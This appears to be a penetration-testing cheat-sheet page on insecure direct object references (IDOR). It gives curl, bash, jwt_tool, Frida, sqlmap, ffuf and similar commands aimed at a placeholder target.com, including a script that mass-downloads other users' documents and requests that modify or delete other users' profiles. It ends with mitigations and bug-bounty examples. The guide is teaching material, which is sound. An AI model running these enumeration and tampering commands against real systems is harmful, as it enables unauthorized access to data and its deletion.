2.-Insecure-direct-object-references-idor

1. Introduction to IDOR

Definition:

IDOR vulnerabilities occur when an application exposes direct references to internal objects (e.g., files, database records) that users can manipulate to access unauthorized data.

Causes:

  • Weak or missing server-side access controls.

  • Developers relying on client-side restrictions instead of enforcing authentication checks.

  • Insecure API endpoints that do not verify user permissions.

Impact:

  • Unauthorized data access (Information Disclosure).

  • Account takeover and privilege escalation.

  • Data modification or deletion.

  • Business logic abuse through chained vulnerabilities.

2. Identifying IDOR Vulnerabilities

Manual URL Parameter Manipulation

curl "http://target.com/documents.php?uid=2"
curl "http://target.com/documents.php?uid=3"

Mass Enumeration (Using curl & grep)

curl -s "http://target.com/documents.php?uid=3" | grep -oP "/documents.*?.pdf"

Automated Mass IDOR Testing (Bash Script)

#!/bin/bash
url="http://target.com"
for i in {1..10}; do
    for link in $(curl -s "$url/documents.php?uid=$i" | grep -oP "/documents.*?.pdf"); do
        wget -q "$url$link"
    done
done

Run the script:

bash ./your_script_name.sh

3. Bypassing Encoded References

Decoding Common Encoding Schemes

Base64 Decode:

echo "MTIzNDU=" | base64 -d

Hex Decode:

echo "3132333435" | xxd -r -p

MD5 Reverse Lookup (Example for Known Hashes)

echo -n "1" | md5sum | awk '{print $1}'

JWT Tampering (Testing for Missing Signature Verification)

Use jwt_tool:

jwt_tool "<JWT_TOKEN>" -d -S none

4. IDOR in APIs

Insecure GET Requests

curl "http://target.com/profile/api.php/profile/2"

Insecure PUT Requests

curl -X PUT -H "Content-Type: application/json" -d '{"uid": 2, "full_name": "New Name"}' "http://target.com/profile/api.php/profile/2"

Insecure DELETE Requests

curl -X DELETE "http://target.com/profile/api.php/profile/11"

5. IDOR in Mobile Apps

Use tools like MobSF and Frida for testing IDOR in mobile applications.

frida -U -n target_app -e "Interceptor.attach(Module.findExportByName(null, 'sendRequest'), {
    onEnter: function(args) {
        console.log('Request:', Memory.readUtf8String(args[1]));
    }
});"

6. Tools for IDOR Exploitation

Burp Suite

  • Burp Intruder (Automated fuzzing)

  • Burp Repeater (Manual testing)

  • Burp Comparer (Response comparison)

ZAP Fuzzer

  • Automated fuzzing and scanning.

SQLMap (For IDOR + SQL Injection):

sqlmap -u "http://target.com/page?id=1" --dbs

Nmap (Port Scanning & Service Detection):

nmap -sV -sC target.com

Gobuster (Directory Brute-Forcing):

gobuster dir -u target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

wfuzz (Fuzzing Parameters):

wfuzz -c -z range,1-100 http://target.com/page?id=FUZZ

Netcat (Manual HTTP Requests):

nc -nv target.com 80
GET /documents.php?uid=2 HTTP/1.1
Host: target.com

ffuf (Fast Fuzzing for APIs & Directories)

ffuf -w wordlist.txt -u http://target.com/api/user/ -X GET -H "Authorization: Bearer TOKEN"

Arjun (Automated Parameter Discovery)

python3 arjun.py -u "http://target.com/api/profile"

7. Prevention & Mitigation

  • Strict Access Control: Ensure every user has proper authentication and authorization.

  • Use UUIDs Instead of Incremental IDs: Avoid predictable identifiers in URLs.

  • Verify Permissions on the Server-Side: Never rely on client-side validation.

  • Use Web Application Firewalls (WAFs): Implement WAFs to detect and block malicious parameter manipulation.

  • Implement Rate Limiting & Logging: Detect mass enumeration attempts in real-time.

  • Penetration Testing: Regularly conduct security audits and tests.

8. Real-World Examples of IDOR Exploitation

  • Facebook’s $40,000 IDOR Bug Bounty (2019): A researcher found an IDOR allowing deletion of live videos from any user account.

  • Uber’s 2017 IDOR Vulnerability: Attackers could access private ride details by modifying booking IDs.

  • Snapchat’s 2018 IDOR Flaw: Researchers bypassed authentication to access private user metadata.

9. Key Takeaways

✅ IDOR vulnerabilities arise from missing access controls on object references. ✅ Attackers exploit predictable identifiers, insecure API endpoints, and weak encoding mechanisms. ✅ Automated tools like Burp, ffuf, Arjun, and SQLMap help identify and exploit IDOR vulnerabilities. ✅ Prevention requires secure coding practices, server-side validation, and UUID usage. ✅ Regular penetration testing is critical to prevent unauthorized access to sensitive data.

Previous1.-HTTP-verb-tamperingNext3.-XML-external-entity-xxe-injection

Last updated